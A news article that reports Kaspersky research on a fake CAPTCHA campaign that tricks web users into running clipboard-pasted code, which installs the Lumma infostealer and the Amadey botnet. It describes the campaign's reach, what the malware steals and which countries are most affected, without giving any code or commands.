Malware campaign expands its use of fake CAPTCHAs

Researchers have observed a new campaign delivering malware through a fake CAPTCHA — a test used on websites to distinguish between humans and bots.

The attackers essentially are exploiting web users’ instincts to quickly click through verification tools. This latest example, according to researchers at the Russian cyber firm Kaspersky, primarily victimizes people through online ads, as well as adult sites, file-sharing services, betting platforms, anime websites and web apps that monetize traffic.

Previous reports identified an earlier version of the operation, though these efforts primarily targeted gamers by distributing information-stealing malware on websites hosting cracked games.

The recent campaign, observed from mid-September to October, shows an expansion of the threat actors’ distribution network, likely aiming to reach a broader pool of victims, the Kaspersky researchers said. 

To infect users with malware known as Lumma and Amadey, the hackers redirect victims to what appears to be a normal CAPTCHA. Clicking the familiar “I’m not a robot” button, however, copies malicious code to the user’s clipboard, while completing other apparently normal verification steps executes the code.

In some attacks, the malicious script downloads and executes an archive containing the Lumma infostealer, which has been available through a malware-as-a-service model on Russian-speaking forums since at least August 2022.

Once installed on a victim’s device, Lumma searches for files associated with cryptocurrency wallets and steals them, according to Kaspersky. The attackers then attempt to extract cookies and other credentials stored in browsers, including data from password manager archives.

After exfiltrating valuable data, the malware visits pages of various online stores. “The purpose here is likely to generate further revenue for its operators by boosting views of these websites, similar to adware,” the researchers said.

While Lumma has previously been used in fake CAPTCHA attacks, Amadey is a newer addition, according to Kaspersky. Amadey is a botnet that first appeared around 2018 and is currently being sold for about $500 on Russian-speaking hacking forums.

Amadey downloads several modules to steal credentials from popular browsers, detects cryptocurrency wallet addresses in the clipboard, and substitutes them with addresses controlled by the attackers. One module can also take screenshots and, in some cases, download the Remcos remote access tool to the victim’s device, giving the attackers full control.

It remains unclear what impact the fake CAPTCHA campaign had or which hacker groups were behind it. However, according to Kaspersky, users in Brazil, Spain, Italy, and Russia were among the most frequently affected.